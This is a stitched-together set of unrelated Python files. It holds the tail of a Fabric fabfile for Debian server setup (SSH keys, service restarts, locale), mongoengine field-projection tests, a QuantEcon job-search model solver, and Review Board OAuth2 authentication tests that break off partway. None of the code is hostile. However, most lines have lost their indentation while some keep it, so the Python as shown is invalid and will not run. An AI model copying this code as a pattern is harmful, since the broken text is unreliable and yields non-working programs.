uncomment('/home/{}/.bashrc'.format(username), r'#\s*force_color_prompt=yes', use_sudo=True)
from fabdeb.python import configure_virtualenvwrapper_for_user
configure_virtualenvwrapper_for_user(username, python_ver=py_ver)
from fabdeb.ftp import add_user_to_proftpd
add_user_to_proftpd(username)
print_green('INFO: Add system user "{}"... OK'.format(username))
@task
def install_user_rsa_key(username):
"""
Install RSA/SSH key for user
"""
check_sudo()
check_os()
    if not user_exists(username):
        abort('User {} does not exist'.format(username))
    if not confirm('Do you want to set an SSH key?'):
return
print_green('INFO: Set SSH key...')
    print_yellow('Setup SSH key methods:\n'
                 '1: Generate a new ~/.ssh/id_rsa key and manually add the public key to remote servers.\n'
                 '2: Copy an existing SSH RSA key from the local machine to ~/.ssh/id_rsa.\n'
                 '3: Copy an existing SSH RSA key from the local machine to ~/.ssh/{keyname}.rsa and configure ~/.ssh/config.')
n = prompt('Select method', default='1', validate='[1-3]')
def file_exists_validator(fn):
fn = fn.replace('\\', '/')
if not os.path.exists(fn):
raise ValueError('File {} does not exist.'.format(fn))
return fn
with settings(sudo_user=username, user=username, group=username):
sudo('mkdir ~/.ssh', warn_only=True)
if n == '1':
with settings(sudo_user=username, user=username, group=username):
sudo('ssh-keygen -t rsa -b 2048 -f ~/.ssh/id_rsa')
sudo('chmod 600 ~/.ssh/id_rsa', warn_only=True)
pub = sudo('cat ~/.ssh/id_rsa.pub', quiet=True)
print_red('Add this public key to remote host:\n\n{}\n\n'.format(pub))
while not confirm('Did you do it?'):
pass
elif n == '2':
        local_key_fn = prompt('Set the path to the RSA key on the local machine (on Windows omit the "C:" part)',
                              default='/home/yourusername/.ssh/id_rsa', validate=file_exists_validator)
put(local_key_fn, '/home/{}/.ssh/id_rsa'.format(username), use_sudo=True, mode=0o600)
sudo('chown {u}:{u} /home/{u}/.ssh/id_rsa'.format(u=username))
elif n == '3':
        local_key_fn = prompt('Set the path to the RSA key on the local machine (on Windows omit the "C:" part)',
                              default='/home/yourusername/.ssh/id_rsa', validate=file_exists_validator)
kn = prompt('Set key name which will be saved as ~/.ssh/{keyname}.rsa', default='key', validate='\w+')
put(local_key_fn, '/home/{u}/.ssh/{kn}.rsa'.format(u=username, kn=kn), use_sudo=True, mode=0o600)
sudo('chown {u}:{u} /home/{u}/.ssh/{kn}.rsa'.format(u=username, kn=kn))
h = p = u = None
while True:
            h = prompt('Set the hostname that will use the ~/.ssh/{}.rsa key (without port!)'.format(kn),
                       default='github.com', validate='.+')
            p = prompt('Set the port that will use the ~/.ssh/{}.rsa key, e.g. "22" (optional)'.format(kn),
                       default='', validate='|\d+')
            u = prompt('Set the user that will use the ~/.ssh/{}.rsa key, e.g. "git" (optional)'.format(kn),
                       validate='|\w+')
            print_yellow(('HostName: {h}\n'
'Port: {p}\n'
'User: {u}').format(h=h, p=(p or '-NONE-'), u=(u or '-NONE-')))
            if confirm('Is this correct?'):
break
cf = '~/.ssh/config'
with settings(sudo_user=username, user=username, group=username):
append(cf, '\nHost {}'.format(h), use_sudo=True)
append(cf, '\tHostName {}'.format(h), use_sudo=True)
append(cf, '\tIdentityFile ~/.ssh/{}.rsa'.format(kn), use_sudo=True)
if p:
append(cf, '\tPort {}'.format(p), use_sudo=True)
if u:
append(cf, '\tUser {}'.format(u), use_sudo=True)
else:
abort('Unknown method')
print_green('INFO: Set SSH key... OK')
@task
def service_restart(service_name, attempt=20):
"""
service ... stop; service ... start
"""
check_sudo()
check_os()
n = 1
while True:
r = sudo('service {s} stop; service {s} start'.format(s=service_name), warn_only=True)
if r.succeeded:
break
if n >= attempt:
            abort('Failed to restart service {} after {} attempts'.format(service_name, attempt))
n += 1
time.sleep(1)
@task
def server_reboot():
"""
Reboot host
"""
check_sudo()
check_os()
if not confirm('Do you want to reboot server?'):
return
reboot(wait=180)
@task
def update_locale():
"""
Setup en_US.UTF-8 system locale
"""
check_sudo()
check_os()
comment('/etc/locale.gen', r'^[^#]', use_sudo=True)
uncomment('/etc/locale.gen', r'en_US\.UTF\-8', use_sudo=True, backup='')
sudo('locale-gen')
    sudo('echo \'LANGUAGE="en_US.UTF-8"\' > /etc/default/locale') # a locale warning may be printed here; it's OK
sudo('echo \'LANG="en_US.UTF-8"\' >> /etc/default/locale')
sudo('echo \'LC_ALL="en_US.UTF-8"\' >> /etc/default/locale')
disconnect_all()
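# Usage sketch (not part of the original fabfile; the host address and user name
# below are illustrative assumptions): the tasks above are intended to be run
# with Fabric 1.x against a fresh Debian host, e.g.
#
#   fab -H root@203.0.113.10 check_os
#   fab -H root@203.0.113.10 setup_swap configure_hostname configure_timezone update_locale
#   fab -H root@203.0.113.10 add_user:webuser,py_ver=3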
|
|
import unittest
from mongoengine import *
from mongoengine.queryset import QueryFieldList
__all__ = ("QueryFieldListTest", "OnlyExcludeAllTest")
class QueryFieldListTest(unittest.TestCase):
def test_empty(self):
q = QueryFieldList()
self.assertFalse(q)
q = QueryFieldList(always_include=['_cls'])
self.assertFalse(q)
def test_include_include(self):
q = QueryFieldList()
q += QueryFieldList(fields=['a', 'b'], value=QueryFieldList.ONLY, _only_called=True)
self.assertEqual(q.as_dict(), {'a': 1, 'b': 1})
q += QueryFieldList(fields=['b', 'c'], value=QueryFieldList.ONLY)
self.assertEqual(q.as_dict(), {'a': 1, 'b': 1, 'c': 1})
def test_include_exclude(self):
q = QueryFieldList()
q += QueryFieldList(fields=['a', 'b'], value=QueryFieldList.ONLY)
self.assertEqual(q.as_dict(), {'a': 1, 'b': 1})
q += QueryFieldList(fields=['b', 'c'], value=QueryFieldList.EXCLUDE)
self.assertEqual(q.as_dict(), {'a': 1})
def test_exclude_exclude(self):
q = QueryFieldList()
q += QueryFieldList(fields=['a', 'b'], value=QueryFieldList.EXCLUDE)
self.assertEqual(q.as_dict(), {'a': 0, 'b': 0})
q += QueryFieldList(fields=['b', 'c'], value=QueryFieldList.EXCLUDE)
self.assertEqual(q.as_dict(), {'a': 0, 'b': 0, 'c': 0})
def test_exclude_include(self):
q = QueryFieldList()
q += QueryFieldList(fields=['a', 'b'], value=QueryFieldList.EXCLUDE)
self.assertEqual(q.as_dict(), {'a': 0, 'b': 0})
q += QueryFieldList(fields=['b', 'c'], value=QueryFieldList.ONLY)
self.assertEqual(q.as_dict(), {'c': 1})
def test_always_include(self):
q = QueryFieldList(always_include=['x', 'y'])
q += QueryFieldList(fields=['a', 'b', 'x'], value=QueryFieldList.EXCLUDE)
q += QueryFieldList(fields=['b', 'c'], value=QueryFieldList.ONLY)
self.assertEqual(q.as_dict(), {'x': 1, 'y': 1, 'c': 1})
def test_reset(self):
q = QueryFieldList(always_include=['x', 'y'])
q += QueryFieldList(fields=['a', 'b', 'x'], value=QueryFieldList.EXCLUDE)
q += QueryFieldList(fields=['b', 'c'], value=QueryFieldList.ONLY)
self.assertEqual(q.as_dict(), {'x': 1, 'y': 1, 'c': 1})
q.reset()
self.assertFalse(q)
q += QueryFieldList(fields=['b', 'c'], value=QueryFieldList.ONLY)
self.assertEqual(q.as_dict(), {'x': 1, 'y': 1, 'b': 1, 'c': 1})
def test_using_a_slice(self):
q = QueryFieldList()
q += QueryFieldList(fields=['a'], value={"$slice": 5})
self.assertEqual(q.as_dict(), {'a': {"$slice": 5}})
class OnlyExcludeAllTest(unittest.TestCase):
def setUp(self):
connect(db='mongoenginetest')
class Person(Document):
name = StringField()
age = IntField()
meta = {'allow_inheritance': True}
Person.drop_collection()
self.Person = Person
def test_mixing_only_exclude(self):
class MyDoc(Document):
a = StringField()
b = StringField()
c = StringField()
d = StringField()
e = StringField()
f = StringField()
include = ['a', 'b', 'c', 'd', 'e']
exclude = ['d', 'e']
only = ['b', 'c']
qs = MyDoc.objects.fields(**{i: 1 for i in include})
self.assertEqual(qs._loaded_fields.as_dict(),
{'a': 1, 'b': 1, 'c': 1, 'd': 1, 'e': 1})
qs = qs.only(*only)
self.assertEqual(qs._loaded_fields.as_dict(), {'b': 1, 'c': 1})
qs = qs.exclude(*exclude)
self.assertEqual(qs._loaded_fields.as_dict(), {'b': 1, 'c': 1})
qs = MyDoc.objects.fields(**{i: 1 for i in include})
qs = qs.exclude(*exclude)
self.assertEqual(qs._loaded_fields.as_dict(), {'a': 1, 'b': 1, 'c': 1})
qs = qs.only(*only)
self.assertEqual(qs._loaded_fields.as_dict(), {'b': 1, 'c': 1})
qs = MyDoc.objects.exclude(*exclude)
qs = qs.fields(**{i: 1 for i in include})
self.assertEqual(qs._loaded_fields.as_dict(), {'a': 1, 'b': 1, 'c': 1})
qs = qs.only(*only)
self.assertEqual(qs._loaded_fields.as_dict(), {'b': 1, 'c': 1})
def test_slicing(self):
class MyDoc(Document):
a = ListField()
b = ListField()
c = ListField()
d = ListField()
e = ListField()
f = ListField()
include = ['a', 'b', 'c', 'd', 'e']
exclude = ['d', 'e']
only = ['b', 'c']
qs = MyDoc.objects.fields(**{i: 1 for i in include})
qs = qs.exclude(*exclude)
qs = qs.only(*only)
qs = qs.fields(slice__b=5)
self.assertEqual(qs._loaded_fields.as_dict(),
{'b': {'$slice': 5}, 'c': 1})
qs = qs.fields(slice__c=[5, 1])
self.assertEqual(qs._loaded_fields.as_dict(),
{'b': {'$slice': 5}, 'c': {'$slice': [5, 1]}})
qs = qs.exclude('c')
self.assertEqual(qs._loaded_fields.as_dict(),
{'b': {'$slice': 5}})
def test_mix_slice_with_other_fields(self):
class MyDoc(Document):
a = ListField()
b = ListField()
c = ListField()
qs = MyDoc.objects.fields(a=1, b=0, slice__c=2)
self.assertEqual(qs._loaded_fields.as_dict(),
{'c': {'$slice': 2}, 'a': 1})
def test_only(self):
"""Ensure that QuerySet.only only returns the requested fields.
"""
person = self.Person(name='test', age=25)
person.save()
obj = self.Person.objects.only('name').get()
self.assertEqual(obj.name, person.name)
self.assertEqual(obj.age, None)
obj = self.Person.objects.only('age').get()
self.assertEqual(obj.name, None)
self.assertEqual(obj.age, person.age)
obj = self.Person.objects.only('name', 'age').get()
self.assertEqual(obj.name, person.name)
self.assertEqual(obj.age, person.age)
obj = self.Person.objects.only(*('id', 'name',)).get()
self.assertEqual(obj.name, person.name)
self.assertEqual(obj.age, None)
# Check polymorphism still works
class Employee(self.Person):
salary = IntField(db_field='wage')
employee = Employee(name='test employee', age=40, salary=30000)
employee.save()
obj = self.Person.objects(id=employee.id).only('age').get()
self.assertTrue(isinstance(obj, Employee))
# Check field names are looked up properly
obj = Employee.objects(id=employee.id).only('salary').get()
self.assertEqual(obj.salary, employee.salary)
self.assertEqual(obj.name, None)
def test_only_with_subfields(self):
class User(EmbeddedDocument):
name = StringField()
email = StringField()
class Comment(EmbeddedDocument):
title = StringField()
text = StringField()
class BlogPost(Document):
content = StringField()
author = EmbeddedDocumentField(User)
comments = ListField(EmbeddedDocumentField(Comment))
BlogPost.drop_collection()
post = BlogPost(content='Had a good coffee today...')
post.author = User(name='Test User')
post.comments = [Comment(title='I aggree', text='Great post!'), Comment(title='Coffee', text='I hate coffee')]
post.save()
obj = BlogPost.objects.only('author.name',).get()
self.assertEqual(obj.content, None)
self.assertEqual(obj.author.email, None)
self.assertEqual(obj.author.name, 'Test User')
self.assertEqual(obj.comments, [])
obj = BlogPost.objects.only('content', 'comments.title',).get()
self.assertEqual(obj.content, 'Had a good coffee today...')
self.assertEqual(obj.author, None)
self.assertEqual(obj.comments[0].title, 'I aggree')
self.assertEqual(obj.comments[1].title, 'Coffee')
self.assertEqual(obj.comments[0].text, None)
self.assertEqual(obj.comments[1].text, None)
obj = BlogPost.objects.only('comments',).get()
self.assertEqual(obj.content, None)
self.assertEqual(obj.author, None)
self.assertEqual(obj.comments[0].title, 'I aggree')
self.assertEqual(obj.comments[1].title, 'Coffee')
self.assertEqual(obj.comments[0].text, 'Great post!')
self.assertEqual(obj.comments[1].text, 'I hate coffee')
BlogPost.drop_collection()
def test_exclude(self):
class User(EmbeddedDocument):
name = StringField()
email = StringField()
class Comment(EmbeddedDocument):
title = StringField()
text = StringField()
class BlogPost(Document):
content = StringField()
author = EmbeddedDocumentField(User)
comments = ListField(EmbeddedDocumentField(Comment))
BlogPost.drop_collection()
post = BlogPost(content='Had a good coffee today...')
post.author = User(name='Test User')
post.comments = [Comment(title='I aggree', text='Great post!'), Comment(title='Coffee', text='I hate coffee')]
post.save()
obj = BlogPost.objects.exclude('author', 'comments.text').get()
self.assertEqual(obj.author, None)
self.assertEqual(obj.content, 'Had a good coffee today...')
self.assertEqual(obj.comments[0].title, 'I aggree')
self.assertEqual(obj.comments[0].text, None)
BlogPost.drop_collection()
def test_exclude_only_combining(self):
class Attachment(EmbeddedDocument):
name = StringField()
content = StringField()
class Email(Document):
sender = StringField()
to = StringField()
subject = StringField()
body = StringField()
content_type = StringField()
attachments = ListField(EmbeddedDocumentField(Attachment))
Email.drop_collection()
email = Email(sender='me', to='you', subject='From Russia with Love', body='Hello!', content_type='text/plain')
email.attachments = [
Attachment(name='file1.doc', content='ABC'),
Attachment(name='file2.doc', content='XYZ'),
]
email.save()
obj = Email.objects.exclude('content_type').exclude('body').get()
self.assertEqual(obj.sender, 'me')
self.assertEqual(obj.to, 'you')
self.assertEqual(obj.subject, 'From Russia with Love')
self.assertEqual(obj.body, None)
self.assertEqual(obj.content_type, None)
obj = Email.objects.only('sender', 'to').exclude('body', 'sender').get()
self.assertEqual(obj.sender, None)
self.assertEqual(obj.to, 'you')
self.assertEqual(obj.subject, None)
self.assertEqual(obj.body, None)
self.assertEqual(obj.content_type, None)
obj = Email.objects.exclude('attachments.content').exclude('body').only('to', 'attachments.name').get()
self.assertEqual(obj.attachments[0].name, 'file1.doc')
self.assertEqual(obj.attachments[0].content, None)
self.assertEqual(obj.sender, None)
self.assertEqual(obj.to, 'you')
self.assertEqual(obj.subject, None)
self.assertEqual(obj.body, None)
self.assertEqual(obj.content_type, None)
Email.drop_collection()
def test_all_fields(self):
class Email(Document):
sender = StringField()
to = StringField()
subject = StringField()
body = StringField()
content_type = StringField()
Email.drop_collection()
email = Email(sender='me', to='you', subject='From Russia with Love', body='Hello!', content_type='text/plain')
email.save()
obj = Email.objects.exclude('content_type', 'body').only('to', 'body').all_fields().get()
self.assertEqual(obj.sender, 'me')
self.assertEqual(obj.to, 'you')
self.assertEqual(obj.subject, 'From Russia with Love')
self.assertEqual(obj.body, 'Hello!')
self.assertEqual(obj.content_type, 'text/plain')
Email.drop_collection()
def test_slicing_fields(self):
"""Ensure that query slicing an array works.
"""
class Numbers(Document):
n = ListField(IntField())
Numbers.drop_collection()
numbers = Numbers(n=[0, 1, 2, 3, 4, 5, -5, -4, -3, -2, -1])
numbers.save()
# first three
numbers = Numbers.objects.fields(slice__n=3).get()
self.assertEqual(numbers.n, [0, 1, 2])
# last three
numbers = Numbers.objects.fields(slice__n=-3).get()
self.assertEqual(numbers.n, [-3, -2, -1])
# skip 2, limit 3
numbers = Numbers.objects.fields(slice__n=[2, 3]).get()
self.assertEqual(numbers.n, [2, 3, 4])
# skip to fifth from last, limit 4
numbers = Numbers.objects.fields(slice__n=[-5, 4]).get()
self.assertEqual(numbers.n, [-5, -4, -3, -2])
# skip to fifth from last, limit 10
numbers = Numbers.objects.fields(slice__n=[-5, 10]).get()
self.assertEqual(numbers.n, [-5, -4, -3, -2, -1])
# skip to fifth from last, limit 10 dict method
numbers = Numbers.objects.fields(n={"$slice": [-5, 10]}).get()
self.assertEqual(numbers.n, [-5, -4, -3, -2, -1])
def test_slicing_nested_fields(self):
"""Ensure that query slicing an embedded array works.
"""
class EmbeddedNumber(EmbeddedDocument):
n = ListField(IntField())
class Numbers(Document):
embedded = EmbeddedDocumentField(EmbeddedNumber)
Numbers.drop_collection()
numbers = Numbers()
numbers.embedded = EmbeddedNumber(n=[0, 1, 2, 3, 4, 5, -5, -4, -3, -2, -1])
numbers.save()
# first three
numbers = Numbers.objects.fields(slice__embedded__n=3).get()
self.assertEqual(numbers.embedded.n, [0, 1, 2])
# last three
numbers = Numbers.objects.fields(slice__embedded__n=-3).get()
self.assertEqual(numbers.embedded.n, [-3, -2, -1])
# skip 2, limit 3
numbers = Numbers.objects.fields(slice__embedded__n=[2, 3]).get()
self.assertEqual(numbers.embedded.n, [2, 3, 4])
# skip to fifth from last, limit 4
numbers = Numbers.objects.fields(slice__embedded__n=[-5, 4]).get()
self.assertEqual(numbers.embedded.n, [-5, -4, -3, -2])
# skip to fifth from last, limit 10
numbers = Numbers.objects.fields(slice__embedded__n=[-5, 10]).get()
self.assertEqual(numbers.embedded.n, [-5, -4, -3, -2, -1])
# skip to fifth from last, limit 10 dict method
numbers = Numbers.objects.fields(embedded__n={"$slice": [-5, 10]}).get()
self.assertEqual(numbers.embedded.n, [-5, -4, -3, -2, -1])
def test_exclude_from_subclasses_docs(self):
class Base(Document):
username = StringField()
meta = {'allow_inheritance': True}
class Anon(Base):
anon = BooleanField()
class User(Base):
password = StringField()
wibble = StringField()
Base.drop_collection()
User(username="mongodb", password="secret").save()
user = Base.objects().exclude("password", "wibble").first()
self.assertEqual(user.password, None)
self.assertRaises(LookUpError, Base.objects.exclude, "made_up")
if __name__ == '__main__':
unittest.main()
|
|
"""
Filename: odu.py
Authors: Thomas Sargent, John Stachurski
Solves the "Offer Distribution Unknown" Model by value function
iteration and a second faster method discussed in the corresponding
quantecon lecture.
"""
from textwrap import dedent
from scipy.interpolate import LinearNDInterpolator
from scipy.integrate import fixed_quad
from scipy.stats import beta as beta_distribution
from scipy import interp
from numpy import maximum as npmax
import numpy as np
class SearchProblem(object):
"""
A class to store a given parameterization of the "offer distribution
unknown" model.
Parameters
----------
beta : scalar(float), optional(default=0.95)
The discount parameter
c : scalar(float), optional(default=0.6)
The unemployment compensation
F_a : scalar(float), optional(default=1)
First parameter of beta distribution on F
F_b : scalar(float), optional(default=1)
Second parameter of beta distribution on F
G_a : scalar(float), optional(default=3)
First parameter of beta distribution on G
G_b : scalar(float), optional(default=1.2)
Second parameter of beta distribution on G
w_max : scalar(float), optional(default=2)
Maximum wage possible
w_grid_size : scalar(int), optional(default=40)
Size of the grid on wages
pi_grid_size : scalar(int), optional(default=40)
Size of the grid on probabilities
Attributes
----------
beta, c, w_max : see Parameters
w_grid : np.ndarray
Grid points over wages, ndim=1
pi_grid : np.ndarray
Grid points over pi, ndim=1
grid_points : np.ndarray
Combined grid points, ndim=2
F : scipy.stats._distn_infrastructure.rv_frozen
Beta distribution with params (F_a, F_b), scaled by w_max
G : scipy.stats._distn_infrastructure.rv_frozen
Beta distribution with params (G_a, G_b), scaled by w_max
f : function
Density of F
g : function
Density of G
pi_min : scalar(float)
Minimum of grid over pi
pi_max : scalar(float)
Maximum of grid over pi
"""
def __init__(self, beta=0.95, c=0.6, F_a=1, F_b=1, G_a=3, G_b=1.2,
w_max=2, w_grid_size=40, pi_grid_size=40):
self.beta, self.c, self.w_max = beta, c, w_max
self.F = beta_distribution(F_a, F_b, scale=w_max)
self.G = beta_distribution(G_a, G_b, scale=w_max)
self.f, self.g = self.F.pdf, self.G.pdf # Density functions
self.pi_min, self.pi_max = 1e-3, 1 - 1e-3 # Avoids instability
self.w_grid = np.linspace(0, w_max, w_grid_size)
self.pi_grid = np.linspace(self.pi_min, self.pi_max, pi_grid_size)
x, y = np.meshgrid(self.w_grid, self.pi_grid)
self.grid_points = np.column_stack((x.ravel(1), y.ravel(1)))
def __repr__(self):
m = "SearchProblem(beta={b}, c={c}, F_a={fa}, F_b={fb}, G_a={ga}, "
m += "G_b={gb}, w_max={wu}, w_grid_size={wgs}, pi_grid_size={pgs})"
fa, fb = self.F.args
ga, gb = self.G.args
return m.format(b=self.beta, c=self.c, fa=fa, fb=fb, ga=ga,
gb=gb, wu=self.w_grid.max(),
wgs=self.w_grid.size, pgs=self.pi_grid.size)
def __str__(self):
m = """\
SearchProblem (offer distribution unknown):
- beta (discount factor) : {b:g}
- c (unemployment compensation) : {c}
- F (distribution F) : Beta({fa}, {fb:g})
- G (distribution G) : Beta({ga}, {gb:g})
- w bounds (bounds for wage offers) : ({wl:g}, {wu:g})
- w grid size (number of points in grid for wage) : {wgs}
- pi bounds (bounds for probability of dist f) : ({pl:g}, {pu:g})
- pi grid size (number of points in grid for pi) : {pgs}
"""
fa, fb = self.F.args
ga, gb = self.G.args
return dedent(m.format(b=self.beta, c=self.c, fa=fa, fb=fb, ga=ga,
gb=gb,
wl=self.w_grid.min(), wu=self.w_grid.max(),
wgs=self.w_grid.size,
pl=self.pi_grid.min(), pu=self.pi_grid.max(),
pgs=self.pi_grid.size))
def q(self, w, pi):
"""
Updates pi using Bayes' rule and the current wage observation w.
Returns
-------
new_pi : scalar(float)
The updated probability
"""
new_pi = 1.0 / (1 + ((1 - pi) * self.g(w)) / (pi * self.f(w)))
        # Clamp new_pi to [pi_min, pi_max]; outside that range return the nearest endpoint
new_pi = np.maximum(np.minimum(new_pi, self.pi_max), self.pi_min)
return new_pi
def bellman_operator(self, v):
"""
        The Bellman operator. Included for comparison; value function
        iteration is not recommended for this problem. See the
        reservation wage operator below.
Parameters
----------
v : array_like(float, ndim=1, length=len(pi_grid))
An approximate value function represented as a
one-dimensional array.
Returns
-------
new_v : array_like(float, ndim=1, length=len(pi_grid))
The updated value function
"""
# == Simplify names == #
f, g, beta, c, q = self.f, self.g, self.beta, self.c, self.q
vf = LinearNDInterpolator(self.grid_points, v)
N = len(v)
new_v = np.empty(N)
for i in range(N):
w, pi = self.grid_points[i, :]
v1 = w / (1 - beta)
integrand = lambda m: vf(m, q(m, pi)) * (pi * f(m)
+ (1 - pi) * g(m))
integral, error = fixed_quad(integrand, 0, self.w_max)
v2 = c + beta * integral
new_v[i] = max(v1, v2)
return new_v
def get_greedy(self, v):
"""
Compute optimal actions taking v as the value function.
Parameters
----------
v : array_like(float, ndim=1, length=len(pi_grid))
An approximate value function represented as a
one-dimensional array.
Returns
-------
policy : array_like(float, ndim=1, length=len(pi_grid))
The decision to accept or reject an offer where 1 indicates
accept and 0 indicates reject
"""
# == Simplify names == #
f, g, beta, c, q = self.f, self.g, self.beta, self.c, self.q
vf = LinearNDInterpolator(self.grid_points, v)
N = len(v)
policy = np.zeros(N, dtype=int)
for i in range(N):
w, pi = self.grid_points[i, :]
v1 = w / (1 - beta)
integrand = lambda m: vf(m, q(m, pi)) * (pi * f(m) +
(1 - pi) * g(m))
integral, error = fixed_quad(integrand, 0, self.w_max)
v2 = c + beta * integral
policy[i] = v1 > v2 # Evaluates to 1 or 0
return policy
def res_wage_operator(self, phi):
"""
Updates the reservation wage function guess phi via the operator
Q.
Parameters
----------
phi : array_like(float, ndim=1, length=len(pi_grid))
            The current guess of the reservation wage function
Returns
-------
new_phi : array_like(float, ndim=1, length=len(pi_grid))
The updated reservation wage guess.
"""
# == Simplify names == #
beta, c, f, g, q = self.beta, self.c, self.f, self.g, self.q
# == Turn phi into a function == #
phi_f = lambda p: interp(p, self.pi_grid, phi)
new_phi = np.empty(len(phi))
for i, pi in enumerate(self.pi_grid):
def integrand(x):
"Integral expression on right-hand side of operator"
return npmax(x, phi_f(q(x, pi))) * (pi*f(x) + (1 - pi)*g(x))
integral, error = fixed_quad(integrand, 0, self.w_max)
new_phi[i] = (1 - beta) * c + beta * integral
return new_phi
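# A minimal usage sketch (not part of the original module): iterate the
# reservation wage operator Q to an approximate fixed point. The tolerance,
# iteration cap and initial guess below are illustrative assumptions.
if __name__ == '__main__':
    sp = SearchProblem(pi_grid_size=50)
    phi = np.ones(len(sp.pi_grid))   # initial guess for the reservation wage
    tol, max_iter = 1e-4, 500
    for i in range(max_iter):
        new_phi = sp.res_wage_operator(phi)
        error = np.max(np.abs(new_phi - phi))
        phi = new_phi
        if error < tol:
            break
    print("Reservation wage operator converged after {0} iterations "
          "(error = {1:.2e})".format(i + 1, error))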
|
|
"""Tests for OAuth2 authentication with the web API."""
from datetime import timedelta
from django.contrib.auth.models import User
from djblets.features.testing import override_feature_check
from djblets.testing.decorators import add_fixtures
from djblets.webapi.auth.backends import reset_auth_backends
from djblets.webapi.testing.testcases import WebAPITestCaseMixin
from reviewboard.admin.siteconfig import load_site_config
from reviewboard.oauth.features import oauth2_service_feature
from reviewboard.site.models import LocalSite
from reviewboard.testing import TestCase
from reviewboard.webapi.tests.mimetypes import error_mimetype, session_mimetype
from reviewboard.webapi.tests.urls import get_session_url
class OAuth2TokenAuthTests(WebAPITestCaseMixin, TestCase):
"""Authentcaiton tests for OAuth2 tokens."""
error_mimetype = error_mimetype
fixtures = ['test_users']
def setUp(self):
super(OAuth2TokenAuthTests, self).setUp()
self.owner = User.objects.get(username='doc')
self.user = User.objects.get(username='grumpy')
def tearDown(self):
super(OAuth2TokenAuthTests, self).tearDown()
load_site_config()
reset_auth_backends()
@classmethod
def tearDownClass(cls):
super(OAuth2TokenAuthTests, cls).tearDownClass()
load_site_config()
reset_auth_backends()
def test_auth(self):
"""Testing OAuth2 authentication to the Web API with a valid token"""
application = self.create_oauth_application(user=self.owner)
token = self.create_oauth_token(application, self.user, 'session:read')
with override_feature_check(oauth2_service_feature.feature_id, True):
load_site_config()
rsp = self.api_get(get_session_url(),
HTTP_AUTHORIZATION='Bearer %s' % token.token,
expected_mimetype=session_mimetype)
self.assertIn('stat', rsp)
self.assertEqual(rsp['stat'], 'ok')
def test_auth_disabled_app(self):
"""Testing OAuth2 authentication to the Web API with a valid token
against a disabled app
"""
application = self.create_oauth_application(user=self.owner,
enabled=False)
token = self.create_oauth_token(application, self.user, 'session:read')
with override_feature_check(oauth2_service_feature.feature_id, True):
load_site_config()
rsp = self.api_get(get_session_url(),
HTTP_AUTHORIZATION='Bearer %s' % token.token,
expected_status=401)
self.assertIn('stat', rsp)
self.assertEqual(rsp['stat'], 'fail')
def test_auth_feature_disabled(self):
"""Testing OAuth2 authentication to the Web API with a valid token
with the feature disabled
"""
application = self.create_oauth_application(user=self.owner)
token = self.create_oauth_token(application, self.user, 'session:read')
with override_feature_check(oauth2_service_feature.feature_id, False):
load_site_config()
rsp = self.api_get(get_session_url(),
HTTP_AUTHORIZATION='Bearer %s' % token.token,
expected_status=401)
self.assertIn('stat', rsp)
self.assertEqual(rsp['stat'], 'fail')
def test_auth_expired(self):
"""Testing OAuth2 authentication to the Web API with an expired token
"""
application = self.create_oauth_application(user=self.owner)
token = self.create_oauth_token(application, self.user, 'session:read',
expires=timedelta(hours=-1))
with override_feature_check(oauth2_service_feature.feature_id, True):
load_site_config()
rsp = self.api_get(get_session_url(),
HTTP_AUTHORIZATION='Bearer %s' % token.token,
expected_status=401)
self.assertIn('stat', rsp)
self.assertEqual(rsp['stat'], 'fail')
def test_auth_invalid_scope(self):
"""Testing OAuth2 authentication to the Web API with a token missing
scopes"""
application = self.create_oauth_application(user=self.owner)
token = self.create_oauth_token(application, self.user)
with override_feature_check(oauth2_service_feature.feature_id, True):
load_site_config()
rsp = self.api_get(get_session_url(),
HTTP_AUTHORIZATION='Bearer %s' % token.token,
expected_status=403)
self.assertIn('stat', rsp)
self.assertEqual(rsp['stat'], 'fail')
@add_fixtures(['test_site'])
def test_auth_local_site(self):
"""Testing OAuth2 authentication to the Web API with a token limited to
a Local Site
"""
local_site = LocalSite.objects.get(pk=1)
local_site.users.add(self.user)
application = self.create_oauth_application(user=self.owner,
local_site=local_site)
token = self.create_oauth_token(application, self.user, 'session:read')
with override_feature_check(oauth2_service_feature.feature_id, True):
load_site_config()
rsp = self.api_get(get_session_url(),
HTTP_AUTHORIZATION='Bearer %s' % token.token,
expected_status=401)
self.assertIn('stat', rsp)
self.assertEqual(rsp['stat'], 'fail')
@add_fixtures(['test_site'])
def test_auth_no_local_site(self):
"""Testing OAuth2 authentication to the Web API of a Local Site with an
application not on that Local Site
"""
local_site = LocalSite.objects.get(pk=1)
local_site.users.add(self.user)
application = self.create_oauth_application(user=self.owner)
token = self.create_oauth_token(application, self.user, 'session:read')
with override_feature_check(oauth2_service_feature.feature_id, True):
load_site_config()
rsp = self.api_get(get_session_url(local_site.name),
HTTP_AUTHORIZATION='Bearer %s' % token.token,
expected_status=401)
self.assertIn('stat', rsp)
self.assertEqual(rsp['stat'], 'fail')
@add_fixtures(['test_site'])
def test_auth_no_local_site_access(self):
"""Testing OAuth2 authentication to the Web API of a Local Site with an
application on that site without access to it
"""
local_site = LocalSite.objects.get(pk=1)
self.assertFalse(local_site.is_accessible_by(self.user))
application = self.create_oauth_application(user=self.owner,
local_site=local_site)
token = self.create_oauth_token(application, self.user, 'session:read')
with override_feature_check(oauth2_service_feature.feature_id, True):
load_site_config()
rsp = self.api_get(get_session_url(local_site.name),
HTTP_AUTHORIZATION='Bearer %s' % token.token,
expected_status=401)
self.assertIn('stat', rsp)
self.assertEqual(rsp['stat'], 'fail')
@add_fixtures(['test_site'])
def test_auth_local_site_public(self):
"""Testing OAuth2 authentication to the Web API of a public Local Site
with an application on that Local Site
"""
local_site = LocalSite.objects.get(pk=1)
local_site.public = True
local_site.save(update_fields=('public',))
self.assertTrue(local_site.is_accessible_by(self.user))
application = self.create_oauth_application(user=self.owner,
local_site=local_site)
token = self.create_oauth_token(application, self.user, 'session:read')
with override_feature_check(oauth2_service_feature.feature_id, True):
load_site_config()
rsp = self.api_get(get_session_url(local_site.name),
HTTP_AUTHORIZATION='Bearer %s' % token.token,
expected_mimetype=session_mimetype)
self.assertIn('stat', rsp)
self.assertEqual(rsp['stat'], 'ok')
@add_fixtures(['test_site'])
def test_auth_local_site_member(self):
"""Testing OAuth2 authentication to the Web API of a Local Site with
with an application on a that Local Site as a member
"""
local_site = LocalSite.objects.get(pk=1)
local_site.users.add(self.user)
local_site.save(update_fields=('public',))
self.assertTrue(local_site.is_accessible_by(self.user))
application = self.create_oauth_application(user=self.owner,
local_site=local_site)
token = self.create_oauth_token(application, self.user, 'session:read')
with override_feature_check(oauth2_service_feature.feature_id, True):
